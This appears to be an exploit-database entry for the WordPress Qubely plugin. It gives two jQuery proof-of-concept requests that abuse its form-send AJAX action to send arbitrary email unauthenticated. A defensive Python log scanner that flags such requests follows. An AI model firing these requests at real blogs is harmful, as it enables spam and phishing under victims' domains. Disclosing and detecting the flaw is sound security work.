## https://sploitus.com/exploit?id=WPEX-ID:93B893BE-59AD-4500-8EDB-9FA7A45304D5
Execute the command below in the web developer console on the blog homepage as an unauthenticated user, replacing DOMAIN with the domain of the blog:

Current PoC:

```js
jQuery.post('/wp-admin/admin-ajax.php?action=qubely_send_form_data', { 'email-receiver': 'victim@whatever.com', 'email-subject': 'Unauthorised Email', 'email-from': 'xx:sender@DOMAIN', 'email-body':'Yolo', 'security': qubely_urls['nonce'] })
```


Pre-1.8.5 PoC:


```js
jQuery.post('/wp-admin/admin-ajax.php?action=qubely_send_form_data', { 'email-receiver': btoa('victim@whatever.com'), 'email-subject': btoa('Unauthorised Email'), 'email-from': btoa('xx:sender@DOMAIN'), 'email-body': btoa('Yolo') });
```
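
A defensive check for the request shown in the PoCs above, as an added example that is not part of the original page: it scans web server access logs for POSTs to `admin-ajax.php` that carry the `qubely_send_form_data` action in the query string and counts them per client. The combined log format, the threshold of 3 and the sample lines are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Combined Log Format (assumed): ip - user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
AJAX_SUFFIX = "/wp-admin/admin-ajax.php"  # suffix match also covers subdirectory installs
ACTION = "qubely_send_form_data"          # action name taken from the PoC on this page


def is_form_send(line):
    """Return the client IP if the line is a POST to the form-send action, else None."""
    m = LINE_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    url = urlsplit(m["target"])
    if not url.path.endswith(AJAX_SUFFIX):
        return None
    if ACTION not in parse_qs(url.query).get("action", []):
        return None
    return m["ip"]


def flag_senders(lines, threshold=3):
    """Count form-send requests per client; return clients at or above threshold."""
    counts = Counter(ip for ip in map(is_form_send, lines) if ip)
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed sample log lines (documentation IP ranges), not real traffic.
_REQ = '"POST /wp-admin/admin-ajax.php?action=qubely_send_form_data HTTP/1.1" 200 1'
SAMPLE = [
    f'203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] {_REQ} "-" "curl/8.0"',
    f'203.0.113.7 - - [10/Jan/2024:10:00:02 +0000] {_REQ} "-" "curl/8.0"',
    f'203.0.113.7 - - [10/Jan/2024:10:00:03 +0000] {_REQ} "-" "curl/8.0"',
    f'198.51.100.4 - - [10/Jan/2024:10:05:00 +0000] {_REQ} "https://blog.example/contact" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Jan/2024:10:06:00 +0000] '
    '"POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 50 "-" "Mozilla/5.0"',
    '192.0.2.1 - - [10/Jan/2024:10:07:00 +0000] '
    '"GET /wp-admin/admin-ajax.php?action=qubely_send_form_data HTTP/1.1" 400 1 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, n in flag_senders(SAMPLE).items():
        print(f"{ip}: {n} POSTs to action={ACTION}")
```

The check only sees the action when it is in the URL, as in the PoCs. Legitimate form submissions may reach the same action, so treat the per-client count as a lead for review rather than a verdict.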